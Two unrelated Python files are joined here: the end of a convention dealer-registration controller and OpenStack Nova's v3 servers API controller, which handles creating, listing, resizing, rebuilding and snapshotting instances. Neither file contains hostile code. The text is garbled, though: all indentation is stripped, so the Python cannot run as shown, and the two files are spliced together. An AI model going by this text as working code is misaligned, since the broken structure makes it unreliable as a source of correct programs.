session.add(group)
ribbon_to_use = None if 'ribbon' not in params else params['ribbon']
message = session.assign_badges(group, params['badges'], params['badge_type'], ribbon_to_use)
if not message and new_dealer and not (first_name and last_name and email and group.badges):
message = 'When registering a new Dealer, you must enter the name and email address of the group leader and must allocate at least one badge'
if not message:
if new_dealer:
session.commit()
leader = group.leader = group.attendees[0]
leader.first_name, leader.last_name, leader.email = first_name, last_name, email
leader.placeholder = True
if group.status == c.APPROVED:
if group.amount_unpaid:
raise HTTPRedirect('../preregistration/group_members?id={}', group.id)
else:
raise HTTPRedirect('index?message={}', group.name + ' has been uploaded, approved, and marked as paid')
else:
raise HTTPRedirect('index?message={}', group.name + ' is uploaded and ' + group.status_label)
else:
raise HTTPRedirect('form?id={}&message={}', group.id, 'Group info uploaded')
return {
'group': group,
'message': message,
'new_dealer': new_dealer,
'first_name': first_name,
'last_name': last_name,
'email': email
}
@ajax
def unapprove(self, session, id, action, email):
assert action in ['waitlisted', 'declined']
group = session.group(id)
subject = 'Your {EVENT_NAME} Dealer registration has been ' + action
if group.email:
send_email(c.MARKETPLACE_EMAIL, group.email, subject, email, bcc=c.MARKETPLACE_EMAIL, model=group)
if action == 'waitlisted':
group.status = c.WAITLISTED
else:
for attendee in group.attendees:
session.delete(attendee)
session.delete(group)
session.commit()
return {'success': True}
@csrf_protected
def delete(self, session, id, confirmed=None):
group = session.group(id)
if group.badges - group.unregistered_badges and not confirmed:
raise HTTPRedirect('deletion_confirmation?id={}', id)
else:
for attendee in group.attendees:
session.delete(attendee)
session.delete(group)
raise HTTPRedirect('index?message={}', 'Group deleted')
def deletion_confirmation(self, session, id):
return {'group': session.group(id)}
@csrf_protected
def assign_leader(self, session, group_id, attendee_id):
group = session.group(group_id)
attendee = session.attendee(attendee_id)
if attendee not in group.attendees:
raise HTTPRedirect('form?id={}&message={}', group_id, 'That attendee has been removed from the group')
else:
group.leader_id = attendee_id
raise HTTPRedirect('form?id={}&message={}', group_id, 'Group leader set')
|
# Copyright 2010 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import re
import stevedore
from oslo.config import cfg
from oslo import messaging
import six
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack.compute.views import servers as views_servers
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova.compute import flavors
from nova import exception
from nova.image import glance
from nova.objects import block_device as block_device_obj
from nova.objects import instance as instance_obj
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import strutils
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import policy
from nova import utils
CONF = cfg.CONF
CONF.import_opt('enable_instance_password',
'nova.api.openstack.compute.servers')
CONF.import_opt('network_api_class', 'nova.network')
CONF.import_opt('reclaim_instance_interval', 'nova.compute.manager')
CONF.import_opt('extensions_blacklist', 'nova.api.openstack', group='osapi_v3')
CONF.import_opt('extensions_whitelist', 'nova.api.openstack', group='osapi_v3')
LOG = logging.getLogger(__name__)
authorizer = extensions.core_authorizer('compute:v3', 'servers')
class ServersController(wsgi.Controller):
"""The Server API base controller class for the OpenStack API."""
EXTENSION_CREATE_NAMESPACE = 'nova.api.v3.extensions.server.create'
EXTENSION_DESERIALIZE_EXTRACT_SERVER_NAMESPACE = (
'nova.api.v3.extensions.server.create.deserialize')
EXTENSION_REBUILD_NAMESPACE = 'nova.api.v3.extensions.server.rebuild'
EXTENSION_DESERIALIZE_EXTRACT_REBUILD_NAMESPACE = (
'nova.api.v3.extensions.server.rebuild.deserialize')
EXTENSION_UPDATE_NAMESPACE = 'nova.api.v3.extensions.server.update'
_view_builder_class = views_servers.ViewBuilderV3
@staticmethod
def _add_location(robj):
# Just in case...
if 'server' not in robj.obj:
return robj
link = filter(lambda l: l['rel'] == 'self',
robj.obj['server']['links'])
if link:
robj['Location'] = utils.utf8(link[0]['href'])
# Convenience return
return robj
def __init__(self, **kwargs):
def _check_load_extension(required_function):
def check_whiteblack_lists(ext):
# Check whitelist is either empty or if not then the extension
# is in the whitelist
if (not CONF.osapi_v3.extensions_whitelist or
ext.obj.alias in CONF.osapi_v3.extensions_whitelist):
# Check the extension is not in the blacklist
if ext.obj.alias not in CONF.osapi_v3.extensions_blacklist:
return True
else:
LOG.warning(_("Not loading %s because it is "
"in the blacklist"), ext.obj.alias)
return False
else:
LOG.warning(
_("Not loading %s because it is not in the whitelist"),
ext.obj.alias)
return False
def check_load_extension(ext):
if isinstance(ext.obj, extensions.V3APIExtensionBase):
# Filter out for the existence of the required
# function here rather than on every request. We
# don't have a new abstract base class to reduce
# duplication in the extensions as they may want
                    # to implement multiple server (and other) entry
                    # points.
if hasattr(ext.obj, required_function):
LOG.debug(_('extension %(ext_alias)s detected by '
'servers extension for function %(func)s'),
{'ext_alias': ext.obj.alias,
'func': required_function})
return check_whiteblack_lists(ext)
else:
LOG.debug(
_('extension %(ext_alias)s is missing %(func)s'),
{'ext_alias': ext.obj.alias,
'func': required_function})
return False
else:
return False
return check_load_extension
self.extension_info = kwargs.pop('extension_info')
super(ServersController, self).__init__(**kwargs)
self.compute_api = compute.API()
# Look for implementation of extension point of server creation
self.create_extension_manager = \
stevedore.enabled.EnabledExtensionManager(
namespace=self.EXTENSION_CREATE_NAMESPACE,
check_func=_check_load_extension('server_create'),
invoke_on_load=True,
invoke_kwds={"extension_info": self.extension_info},
propagate_map_exceptions=True)
if not list(self.create_extension_manager):
LOG.debug(_("Did not find any server create extensions"))
# Look for implementation of extension point of server rebuild
self.rebuild_extension_manager = \
stevedore.enabled.EnabledExtensionManager(
namespace=self.EXTENSION_REBUILD_NAMESPACE,
check_func=_check_load_extension('server_rebuild'),
invoke_on_load=True,
invoke_kwds={"extension_info": self.extension_info},
propagate_map_exceptions=True)
if not list(self.rebuild_extension_manager):
LOG.debug(_("Did not find any server rebuild extensions"))
# Look for implementation of extension point of server update
self.update_extension_manager = \
stevedore.enabled.EnabledExtensionManager(
namespace=self.EXTENSION_UPDATE_NAMESPACE,
check_func=_check_load_extension('server_update'),
invoke_on_load=True,
invoke_kwds={"extension_info": self.extension_info},
propagate_map_exceptions=True)
if not list(self.update_extension_manager):
LOG.debug(_("Did not find any server update extensions"))
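    # Illustrative note (added; the alias names are hypothetical): with
    #   [osapi_v3]
    #   extensions_whitelist = keypairs,scheduler_hints
    #   extensions_blacklist = scheduler_hints
    # only the "keypairs" extension passes check_whiteblack_lists() above,
    # because the blacklist is applied after the whitelist check.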
def index(self, req):
"""Returns a list of server names and ids for a given user."""
try:
servers = self._get_servers(req, is_detail=False)
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
return servers
def detail(self, req):
"""Returns a list of server details for a given user."""
try:
servers = self._get_servers(req, is_detail=True)
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
return servers
def _get_servers(self, req, is_detail):
"""Returns a list of servers, based on any search options specified."""
search_opts = {}
search_opts.update(req.GET)
context = req.environ['nova.context']
remove_invalid_options(context, search_opts,
self._get_server_search_options())
# Verify search by 'status' contains a valid status.
# Convert it to filter by vm_state or task_state for compute_api.
status = search_opts.pop('status', None)
if status is not None:
vm_state, task_state = common.task_and_vm_state_from_status(status)
if not vm_state and not task_state:
return {'servers': []}
search_opts['vm_state'] = vm_state
# When we search by vm state, task state will return 'default'.
# So we don't need task_state search_opt.
if 'default' not in task_state:
search_opts['task_state'] = task_state
if 'changes_since' in search_opts:
try:
parsed = timeutils.parse_isotime(search_opts['changes_since'])
except ValueError:
msg = _('Invalid changes_since value')
raise exc.HTTPBadRequest(explanation=msg)
search_opts['changes_since'] = parsed
# By default, compute's get_all() will return deleted instances.
# If an admin hasn't specified a 'deleted' search option, we need
# to filter out deleted instances by setting the filter ourselves.
# ... Unless 'changes_since' is specified, because 'changes_since'
# should return recently deleted images according to the API spec.
if 'deleted' not in search_opts:
if 'changes_since' not in search_opts:
# No 'changes_since', so we only want non-deleted servers
search_opts['deleted'] = False
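        # The v3 API accepts 'changes_since', but the compute/DB layer filters
        # on the legacy hyphenated 'changes-since' key, so rename it here.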
if 'changes_since' in search_opts:
search_opts['changes-since'] = search_opts.pop('changes_since')
if search_opts.get("vm_state") == ['deleted']:
if context.is_admin:
search_opts['deleted'] = True
else:
msg = _("Only administrators may list deleted instances")
raise exc.HTTPBadRequest(explanation=msg)
# If tenant_id is passed as a search parameter this should
# imply that all_tenants is also enabled unless explicitly
# disabled. Note that the tenant_id parameter is filtered out
# by remove_invalid_options above unless the requestor is an
# admin.
        if 'tenant_id' in search_opts and 'all_tenants' not in search_opts:
# We do not need to add the all_tenants flag if the tenant
# id associated with the token is the tenant id
# specified. This is done so a request that does not need
# the all_tenants flag does not fail because of lack of
# policy permission for compute:get_all_tenants when it
# doesn't actually need it.
if context.project_id != search_opts.get('tenant_id'):
search_opts['all_tenants'] = 1
# If all tenants is passed with 0 or false as the value
# then remove it from the search options. Nothing passed as
# the value for all_tenants is considered to enable the feature
all_tenants = search_opts.get('all_tenants')
if all_tenants:
try:
if not strutils.bool_from_string(all_tenants, True):
del search_opts['all_tenants']
except ValueError as err:
raise exception.InvalidInput(str(err))
if 'all_tenants' in search_opts:
policy.enforce(context, 'compute:get_all_tenants',
{'project_id': context.project_id,
'user_id': context.user_id})
del search_opts['all_tenants']
else:
if context.project_id:
search_opts['project_id'] = context.project_id
else:
search_opts['user_id'] = context.user_id
limit, marker = common.get_limit_and_marker(req)
try:
instance_list = self.compute_api.get_all(context,
search_opts=search_opts, limit=limit, marker=marker,
want_objects=True, expected_attrs=['pci_devices'])
except exception.MarkerNotFound:
msg = _('marker [%s] not found') % marker
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound:
log_msg = _("Flavor '%s' could not be found ")
LOG.debug(log_msg, search_opts['flavor'])
instance_list = []
if is_detail:
instance_list.fill_faults()
response = self._view_builder.detail(req, instance_list)
else:
response = self._view_builder.index(req, instance_list)
req.cache_db_instances(instance_list)
return response
def _get_server(self, context, req, instance_uuid):
"""Utility function for looking up an instance by uuid."""
instance = common.get_instance(self.compute_api, context,
instance_uuid, want_objects=True,
expected_attrs=['pci_devices'])
req.cache_db_instance(instance)
return instance
def _check_string_length(self, value, name, max_length=None):
try:
if isinstance(value, six.string_types):
value = value.strip()
utils.check_string_length(value, name, min_length=1,
max_length=max_length)
except exception.InvalidInput as e:
raise exc.HTTPBadRequest(explanation=e.format_message())
def _validate_server_name(self, value):
self._check_string_length(value, 'Server name', max_length=255)
def _validate_device_name(self, value):
self._check_string_length(value, 'Device name', max_length=255)
if ' ' in value:
msg = _("Device name cannot include spaces.")
raise exc.HTTPBadRequest(explanation=msg)
def _get_requested_networks(self, requested_networks):
"""Create a list of requested networks from the networks attribute."""
networks = []
for network in requested_networks:
try:
# fixed IP address is optional
# if the fixed IP address is not provided then
# it will use one of the available IP address from the network
address = network.get('fixed_ip', None)
if address is not None and not utils.is_valid_ipv4(address):
msg = _("Invalid fixed IP address (%s)") % address
raise exc.HTTPBadRequest(explanation=msg)
port_id = network.get('port', None)
if port_id:
network_uuid = None
if not utils.is_neutron():
# port parameter is only for neutron v2.0
msg = _("Unknown argument: port")
raise exc.HTTPBadRequest(explanation=msg)
if not uuidutils.is_uuid_like(port_id):
msg = _("Bad port format: port uuid is "
"not in proper format "
"(%s)") % port_id
raise exc.HTTPBadRequest(explanation=msg)
if address is not None:
msg = _("Specified Fixed IP '%(addr)s' cannot be used "
"with port '%(port)s': port already has "
"a Fixed IP allocated.") % {"addr": address,
"port": port_id}
raise exc.HTTPBadRequest(explanation=msg)
else:
network_uuid = network['uuid']
if not port_id and not uuidutils.is_uuid_like(network_uuid):
br_uuid = network_uuid.split('-', 1)[-1]
if not uuidutils.is_uuid_like(br_uuid):
msg = _("Bad networks format: network uuid is "
"not in proper format "
"(%s)") % network_uuid
raise exc.HTTPBadRequest(explanation=msg)
# For neutronv2, requested_networks
# should be tuple of (network_uuid, fixed_ip, port_id)
if utils.is_neutron():
networks.append((network_uuid, address, port_id))
else:
# check if the network id is already present in the list,
# we don't want duplicate networks to be passed
# at the boot time
for id, ip in networks:
if id == network_uuid:
expl = (_("Duplicate networks"
" (%s) are not allowed") %
network_uuid)
raise exc.HTTPBadRequest(explanation=expl)
networks.append((network_uuid, address))
except KeyError as key:
expl = _('Bad network format: missing %s') % key
raise exc.HTTPBadRequest(explanation=expl)
except TypeError:
expl = _('Bad networks format')
raise exc.HTTPBadRequest(explanation=expl)
return networks
# NOTE(vish): Without this regex, b64decode will happily
# ignore illegal bytes in the base64 encoded
# data.
B64_REGEX = re.compile('^(?:[A-Za-z0-9+\/]{4})*'
'(?:[A-Za-z0-9+\/]{2}=='
'|[A-Za-z0-9+\/]{3}=)?$')
def _decode_base64(self, data):
data = re.sub(r'\s', '', data)
if not self.B64_REGEX.match(data):
return None
try:
return base64.b64decode(data)
except TypeError:
return None
def show(self, req, id):
"""Returns server details by server id."""
context = req.environ['nova.context']
instance = common.get_instance(self.compute_api, context, id,
want_objects=True,
expected_attrs=['pci_devices'])
req.cache_db_instance(instance)
return self._view_builder.show(req, instance)
@wsgi.response(202)
def create(self, req, body):
"""Creates a new server for a given user."""
if not self.is_valid_body(body, 'server'):
raise exc.HTTPBadRequest(_("The request body is invalid"))
context = req.environ['nova.context']
server_dict = body['server']
password = self._get_server_admin_password(server_dict)
if 'name' not in server_dict:
msg = _("Server name is not defined")
raise exc.HTTPBadRequest(explanation=msg)
name = server_dict['name']
self._validate_server_name(name)
name = name.strip()
# Arguments to be passed to instance create function
create_kwargs = {}
# Query extensions which want to manipulate the keyword
# arguments.
# NOTE(cyeoh): This is the hook that extensions use
# to replace the extension specific code below.
# When the extensions are ported this will also result
# in some convenience function from this class being
# moved to the extension
if list(self.create_extension_manager):
self.create_extension_manager.map(self._create_extension_point,
server_dict, create_kwargs)
image_uuid = self._image_from_req_data(server_dict, create_kwargs)
# NOTE(cyeoh): Although an extension can set
# return_reservation_id in order to request that a reservation
# id be returned to the client instead of the newly created
# instance information we do not want to pass this parameter
# to the compute create call which always returns both. We use
# this flag after the instance create call to determine what
# to return to the client
return_reservation_id = create_kwargs.pop('return_reservation_id',
False)
requested_networks = None
# TODO(cyeoh): bp v3-api-core-as-extensions
# Replace with an extension point when the os-networks
# extension is ported. Currently reworked
# to take into account is_neutron
#if (self.ext_mgr.is_loaded('os-networks')
# or utils.is_neutron()):
# requested_networks = server_dict.get('networks')
if utils.is_neutron():
requested_networks = server_dict.get('networks')
if requested_networks is not None:
requested_networks = self._get_requested_networks(
requested_networks)
try:
flavor_id = self._flavor_id_from_req_data(body)
except ValueError as error:
msg = _("Invalid flavor_ref provided.")
raise exc.HTTPBadRequest(explanation=msg)
try:
inst_type = flavors.get_flavor_by_flavor_id(
flavor_id, ctxt=context, read_deleted="no")
(instances, resv_id) = self.compute_api.create(context,
inst_type,
image_uuid,
display_name=name,
display_description=name,
metadata=server_dict.get('metadata', {}),
admin_password=password,
requested_networks=requested_networks,
**create_kwargs)
except (exception.QuotaError,
exception.PortLimitExceeded) as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message(),
headers={'Retry-After': 0})
except exception.InvalidMetadataSize as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message())
except exception.ImageNotFound as error:
msg = _("Can not find requested image")
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound as error:
msg = _("Invalid flavor_ref provided.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.KeypairNotFound as error:
msg = _("Invalid key_name provided.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.ConfigDriveInvalidValue:
msg = _("Invalid config_drive provided.")
raise exc.HTTPBadRequest(explanation=msg)
except messaging.RemoteError as err:
msg = "%(err_type)s: %(err_msg)s" % {'err_type': err.exc_type,
'err_msg': err.value}
raise exc.HTTPBadRequest(explanation=msg)
except UnicodeDecodeError as error:
msg = "UnicodeError: %s" % unicode(error)
raise exc.HTTPBadRequest(explanation=msg)
except (exception.ImageNotActive,
exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.InvalidMetadata,
exception.InvalidRequest,
exception.MultiplePortsNotApplicable,
exception.InstanceUserDataMalformed,
exception.PortNotFound,
exception.SecurityGroupNotFound,
exception.NetworkNotFound) as error:
raise exc.HTTPBadRequest(explanation=error.format_message())
except (exception.PortInUse,
exception.NoUniqueMatch) as error:
raise exc.HTTPConflict(explanation=error.format_message())
# If the caller wanted a reservation_id, return it
if return_reservation_id:
return wsgi.ResponseObject(
{'servers_reservation': {'reservation_id': resv_id}})
req.cache_db_instances(instances)
server = self._view_builder.create(req, instances[0])
if CONF.enable_instance_password:
server['server']['admin_password'] = password
robj = wsgi.ResponseObject(server)
return self._add_location(robj)
def _create_extension_point(self, ext, server_dict, create_kwargs):
handler = ext.obj
LOG.debug(_("Running _create_extension_point for %s"), ext.obj)
handler.server_create(server_dict, create_kwargs)
def _rebuild_extension_point(self, ext, rebuild_dict, rebuild_kwargs):
handler = ext.obj
LOG.debug(_("Running _rebuild_extension_point for %s"), ext.obj)
handler.server_rebuild(rebuild_dict, rebuild_kwargs)
def _resize_extension_point(self, ext, resize_dict, resize_kwargs):
handler = ext.obj
LOG.debug(_("Running _resize_extension_point for %s"), ext.obj)
handler.server_resize(resize_dict, resize_kwargs)
def _update_extension_point(self, ext, update_dict, update_kwargs):
handler = ext.obj
LOG.debug(_("Running _update_extension_point for %s"), ext.obj)
handler.server_update(update_dict, update_kwargs)
def _delete(self, context, req, instance_uuid):
instance = self._get_server(context, req, instance_uuid)
if CONF.reclaim_instance_interval:
try:
self.compute_api.soft_delete(context, instance)
except exception.InstanceInvalidState:
# Note(yufang521247): instance which has never been active
# is not allowed to be soft_deleted. Thus we have to call
# delete() to clean up the instance.
self.compute_api.delete(context, instance)
else:
self.compute_api.delete(context, instance)
def update(self, req, id, body):
"""Update server then pass on to version-specific controller."""
if not self.is_valid_body(body, 'server'):
raise exc.HTTPBadRequest(_("The request body is invalid"))
ctxt = req.environ['nova.context']
update_dict = {}
if 'name' in body['server']:
name = body['server']['name']
self._validate_server_name(name)
update_dict['display_name'] = name.strip()
if 'host_id' in body['server']:
msg = _("host_id cannot be updated.")
raise exc.HTTPBadRequest(explanation=msg)
if list(self.update_extension_manager):
self.update_extension_manager.map(self._update_extension_point,
body['server'], update_dict)
instance = common.get_instance(self.compute_api, ctxt, id,
want_objects=True,
expected_attrs=['pci_devices'])
try:
# NOTE(mikal): this try block needs to stay because save() still
# might throw an exception.
req.cache_db_instance(instance)
policy.enforce(ctxt, 'compute:update', instance)
instance.update(update_dict)
instance.save()
return self._view_builder.show(req, instance)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
@wsgi.response(202)
@wsgi.action('confirm_resize')
def _action_confirm_resize(self, req, id, body):
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.confirm_resize(context, instance)
except exception.MigrationNotFound:
msg = _("Instance has not been resized.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'confirm_resize')
@wsgi.response(202)
@wsgi.action('revert_resize')
def _action_revert_resize(self, req, id, body):
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.revert_resize(context, instance)
except exception.MigrationNotFound:
msg = _("Instance has not been resized.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.FlavorNotFound:
msg = _("Flavor used by the instance could not be found.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'revert_resize')
return webob.Response(status_int=202)
@wsgi.response(202)
@wsgi.action('reboot')
def _action_reboot(self, req, id, body):
if 'reboot' in body and 'type' in body['reboot']:
if not isinstance(body['reboot']['type'], six.string_types):
msg = _("Argument 'type' for reboot must be a string")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
valid_reboot_types = ['HARD', 'SOFT']
reboot_type = body['reboot']['type'].upper()
            if reboot_type not in valid_reboot_types:
msg = _("Argument 'type' for reboot is not HARD or SOFT")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
else:
msg = _("Missing argument 'type' for reboot")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
try:
self.compute_api.reboot(context, instance, reboot_type)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'reboot')
return webob.Response(status_int=202)
def _resize(self, req, instance_id, flavor_id, **kwargs):
"""Begin the resize process with given instance/flavor."""
context = req.environ["nova.context"]
instance = self._get_server(context, req, instance_id)
try:
self.compute_api.resize(context, instance, flavor_id, **kwargs)
except exception.QuotaError as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message(),
headers={'Retry-After': 0})
except exception.FlavorNotFound:
msg = _("Unable to locate requested flavor.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.CannotResizeToSameFlavor:
msg = _("Resize requires a flavor change.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resize')
except exception.ImageNotAuthorized:
msg = _("You are not authorized to access the image "
"the instance was started with.")
raise exc.HTTPUnauthorized(explanation=msg)
except exception.ImageNotFound:
msg = _("Image that the instance was started "
"with could not be found.")
raise exc.HTTPBadRequest(explanation=msg)
except exception.Invalid:
msg = _("Invalid instance image.")
raise exc.HTTPBadRequest(explanation=msg)
return webob.Response(status_int=202)
@wsgi.response(204)
def delete(self, req, id):
"""Destroys a server."""
try:
self._delete(req.environ['nova.context'], req, id)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'delete')
def _image_uuid_from_href(self, image_href):
# If the image href was generated by nova api, strip image_href
# down to an id and use the default glance connection params
image_uuid = image_href.split('/').pop()
if not uuidutils.is_uuid_like(image_uuid):
msg = _("Invalid image_ref provided.")
raise exc.HTTPBadRequest(explanation=msg)
return image_uuid
def _image_from_req_data(self, server_dict, create_kwargs):
"""Get image data from the request or raise appropriate
exceptions.
The field image_ref is mandatory when no block devices have been
defined and must be a proper uuid when present.
"""
image_href = server_dict.get('image_ref')
if not image_href and create_kwargs.get('block_device_mapping'):
return ''
elif image_href:
return self._image_uuid_from_href(unicode(image_href))
else:
msg = _("Missing image_ref attribute")
raise exc.HTTPBadRequest(explanation=msg)
def _flavor_id_from_req_data(self, data):
try:
flavor_ref = data['server']['flavor_ref']
except (TypeError, KeyError):
msg = _("Missing flavor_ref attribute")
raise exc.HTTPBadRequest(explanation=msg)
return common.get_id_from_href(flavor_ref)
@wsgi.response(202)
@wsgi.action('resize')
def _action_resize(self, req, id, body):
"""Resizes a given instance to the flavor size requested."""
resize_dict = body['resize']
try:
flavor_ref = str(resize_dict["flavor_ref"])
if not flavor_ref:
msg = _("Resize request has invalid 'flavor_ref' attribute.")
raise exc.HTTPBadRequest(explanation=msg)
except (KeyError, TypeError):
msg = _("Resize requests require 'flavor_ref' attribute.")
raise exc.HTTPBadRequest(explanation=msg)
resize_kwargs = {}
return self._resize(req, id, flavor_ref, **resize_kwargs)
@wsgi.response(202)
@wsgi.action('rebuild')
def _action_rebuild(self, req, id, body):
"""Rebuild an instance with the given attributes."""
try:
rebuild_dict = body['rebuild']
except (KeyError, TypeError):
msg = _('Invalid request body')
raise exc.HTTPBadRequest(explanation=msg)
try:
image_href = rebuild_dict["image_ref"]
except (KeyError, TypeError):
msg = _("Could not parse image_ref from request.")
raise exc.HTTPBadRequest(explanation=msg)
image_href = self._image_uuid_from_href(image_href)
password = self._get_server_admin_password(rebuild_dict)
context = req.environ['nova.context']
instance = self._get_server(context, req, id)
attr_map = {
'name': 'display_name',
'metadata': 'metadata',
}
rebuild_kwargs = {}
if 'name' in rebuild_dict:
self._validate_server_name(rebuild_dict['name'])
if 'preserve_ephemeral' in rebuild_dict:
rebuild_kwargs['preserve_ephemeral'] = strutils.bool_from_string(
rebuild_dict['preserve_ephemeral'], strict=True)
if list(self.rebuild_extension_manager):
self.rebuild_extension_manager.map(self._rebuild_extension_point,
rebuild_dict, rebuild_kwargs)
for request_attribute, instance_attribute in attr_map.items():
try:
rebuild_kwargs[instance_attribute] = rebuild_dict[
request_attribute]
except (KeyError, TypeError):
pass
try:
self.compute_api.rebuild(context,
instance,
image_href,
password,
**rebuild_kwargs)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'rebuild')
except exception.InstanceNotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
except exception.InvalidMetadataSize as error:
raise exc.HTTPRequestEntityTooLarge(
explanation=error.format_message())
except exception.ImageNotFound:
msg = _("Cannot find image for rebuild")
raise exc.HTTPBadRequest(explanation=msg)
except (exception.ImageNotActive,
exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.InvalidMetadata) as error:
raise exc.HTTPBadRequest(explanation=error.format_message())
instance = self._get_server(context, req, id)
view = self._view_builder.show(req, instance)
# Add on the admin_password attribute since the view doesn't do it
# unless instance passwords are disabled
if CONF.enable_instance_password:
view['server']['admin_password'] = password
robj = wsgi.ResponseObject(view)
return self._add_location(robj)
@wsgi.response(202)
@wsgi.action('create_image')
@common.check_snapshots_enabled
def _action_create_image(self, req, id, body):
"""Snapshot a server instance."""
context = req.environ['nova.context']
entity = body.get("create_image", {})
image_name = entity.get("name")
if not image_name:
msg = _("create_image entity requires name attribute")
raise exc.HTTPBadRequest(explanation=msg)
props = {}
metadata = entity.get('metadata', {})
common.check_img_metadata_properties_quota(context, metadata)
try:
props.update(metadata)
except ValueError:
msg = _("Invalid metadata")
raise exc.HTTPBadRequest(explanation=msg)
instance = self._get_server(context, req, id)
bdms = block_device_obj.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
try:
if self.compute_api.is_volume_backed_instance(context, instance,
bdms):
img = instance['image_ref']
if not img:
props = bdms.root_metadata(
context, self.compute_api.image_service,
self.compute_api.volume_api)
image_meta = {'properties': props}
else:
src_image = self.compute_api.\
image_service.show(context, img)
image_meta = dict(src_image)
image = self.compute_api.snapshot_volume_backed(
context,
instance,
image_meta,
image_name,
extra_properties=props)
else:
image = self.compute_api.snapshot(context,
instance,
image_name,
extra_properties=props)
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'create_image')
except exception.Invalid as err:
raise exc.HTTPBadRequest(explanation=err.format_message())
# build location of newly-created image entity
image_id = str(image['id'])
image_ref = glance.generate_image_url(image_id)
resp = webob.Response(status_int=202)
resp.headers['Location'] = image_ref
return resp
def _get_server_admin_password(self, server):
"""Determine the admin password for a server on creation."""
try:
password = server['admin_password']
self._validate_admin_password(password)
except KeyError:
password = utils.generate_password()
except ValueError:
raise exc.HTTPBadRequest(explanation=_("Invalid admin_password"))
return password
def _validate_admin_password(self, password):
if not isinstance(password, six.string_types):
raise ValueError()
def _get_server_search_options(self):
"""Return server search options allowed by non-admin."""
return ('reservation_id', 'name', 'status', 'image', 'flavor',
'ip', 'changes_since', 'all_tenants')
def _get_instance(self, context, instance_uuid):
try:
attrs = ['system_metadata', 'metadata']
return instance_obj.Instance.get_by_uuid(context, instance_uuid,
expected_attrs=attrs)
except exception.InstanceNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
@extensions.expected_errors((404, 409))
@wsgi.action('start')
def _start_server(self, req, id, body):
"""Start an instance."""
context = req.environ['nova.context']
instance = self._get_instance(context, id)
authorizer(context, instance, 'start')
LOG.debug(_('start instance'), instance=instance)
try:
self.compute_api.start(context, instance)
except (exception.InstanceNotReady, exception.InstanceIsLocked) as e:
raise webob.exc.HTTPConflict(explanation=e.format_message())
return webob.Response(status_int=202)
@extensions.expected_errors((404, 409))
@wsgi.action('stop')
def _stop_server(self, req, id, body):
"""Stop an instance."""
context = req.environ['nova.context']
instance = self._get_instance(context, id)
authorizer(context, instance, 'stop')
LOG.debug(_('stop instance'), instance=instance)
try:
self.compute_api.stop(context, instance)
except (exception.InstanceNotReady, exception.InstanceIsLocked) as e:
raise webob.exc.HTTPConflict(explanation=e.format_message())
return webob.Response(status_int=202)
def remove_invalid_options(context, search_options, allowed_search_options):
"""Remove search options that are not valid for non-admin API/context."""
if context.is_admin:
# Allow all options
return
# Otherwise, strip out all unknown options
unknown_options = [opt for opt in search_options
if opt not in allowed_search_options]
LOG.debug(_("Removing options '%s' from query"),
", ".join(unknown_options))
for opt in unknown_options:
search_options.pop(opt, None)
class Servers(extensions.V3APIExtensionBase):
"""Servers."""
name = "Servers"
